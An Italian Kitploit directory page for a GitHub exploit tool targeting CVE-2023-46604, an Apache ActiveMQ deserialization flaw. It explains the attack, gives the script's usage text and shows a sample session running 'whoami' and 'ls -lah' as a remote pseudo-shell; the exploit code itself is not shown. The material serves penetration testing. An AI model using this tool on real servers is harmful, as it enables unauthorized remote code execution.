Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-46604-ActiveMQ-RCE-pseudoshell — Questo script sfrutta la CVE-2023046604 (Apache ActiveMQ) per generare una pseudo shell. La vulnerabilità consente l'esecuzione remota di codice a causa di una deserializzazione non sicura all'interno del protocollo OpenWire. | Kitploit
Strumenti/GitHubGitHub/duck-sec/cve-2023-46604-activemq-rce-pseudoshell
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubduck-sec/cve-2023-46604-activemq-rce-pseudoshell

CVE-2023-46604-ActiveMQ-RCE-pseudoshell

Questo script sfrutta la CVE-2023046604 (Apache ActiveMQ) per generare una pseudo shell. La vulnerabilità consente l'esecuzione remota di codice a causa di una deserializzazione non sicura all'interno del protocollo OpenWire.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1962 anni faNon ancora revisionato

CVE-2023-46604 Pseudoshell RCE

Questo script sfrutta CVE-2023-46604 (Apache ActiveMQ) per generare una pseudo shell. La vulnerabilità consente l'esecuzione di codice in remoto a causa di una deserializzazione non sicura all'interno del protocollo OpenWire.

Descrizione

CVE-2023-46604 è una vulnerabilità di deserializzazione presente nel protocollo OpenWire di Apache ActiveMQ. Questa falla può essere sfruttata da un attaccante per eseguire codice arbitrario sul server in cui è in esecuzione ActiveMQ. Un attaccante può creare un file XML malevolo, i cui comandi verranno eseguiti dal server remoto.

Questo exploit automatizza e astrae il processo di creazione del documento XML, fornisce un server di base per consegnare il file e riceve informazioni dal server target tramite POST. Ciò consente di proseguire lo sfruttamento senza la necessità di invocare una reverse shell o distribuire un binario.

Prerequisiti

Prima di eseguire lo script di exploit, assicurati di avere:

  • Python 3.x installato sul tuo sistema.
  • Accesso di rete al server ActiveMQ vulnerabile.
  • Il permesso di testare il server vulnerabile.

Utilizzo

Lo script richiede:

  • IP o Hostname del server ActiveMQ
  • IP di servizio (un IP sul tuo sistema, raggiungibile dal target.)

Opzionale:

  • Porta del server ActiveMQ - default 61616
  • Porta di servizio (la porta su cui avviare il server locale) - default 8080
root@kitploit:~
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]

optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        ActiveMQ Server IP or Hostname
  -p PORT, --port PORT  ActiveMQ Server Port, defaults to 61616
  -si SRVIP, --srvip SRVIP
                        Serve IP
  -sp SRVPORT, --srvport SRVPORT
                        Serve port, defaults to 8080

Esempio

root@kitploit:~
$python3 exploit.py -i 10.129.230.87 -p 61616  -si 10.10.14.59 -sp 8080
#################################################################################
#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #
#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #
#################################################################################

[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################
# Not yet connected, send a command to test connection to host.                 #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you      #
# want to re-check the connection.                                              #
#################################################################################

[Target not responding!]$ whoami
activemq

Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x  5 activemq activemq 4.0K Nov  7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov  6 01:18 ..
-rwxr-xr-x  1 activemq activemq  21K Apr 20  2021 activemq
-rwxr-xr-x  1 activemq activemq 6.1K Apr 20  2021 activemq-diag
-rw-r--r--  1 activemq activemq  17K Apr 20  2021 activemq.jar
-rw-r--r--  1 activemq activemq 5.5K Apr 20  2021 env
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-32
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-64
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 macosx
-rw-r--r--  1 activemq activemq  82K Apr 20  2021 wrapper.jar

Apache ActiveMQ$ 

CVE-2023-46604-RCE.webm

Crediti

Questo exploit si basa sul POC originale in Go di X1r0z e sul POC Python di evkl1d.

Disclaimer

Questo codice è fornito esclusivamente a scopo didattico e per test di sicurezza etici. Deve essere utilizzato in modo responsabile e solo in ambienti in cui sia stata concessa un'autorizzazione esplicita. L'uso non autorizzato o dannoso è severamente vietato. Utilizzando questo codice, accetti di rispettare tutte le leggi, le normative e gli standard etici applicabili nella tua giurisdizione. I creatori e i collaboratori declinano ogni responsabilità per eventuali danni o conseguenze derivanti dall'uso improprio o non autorizzato di questo codice.

Scarica lo strumento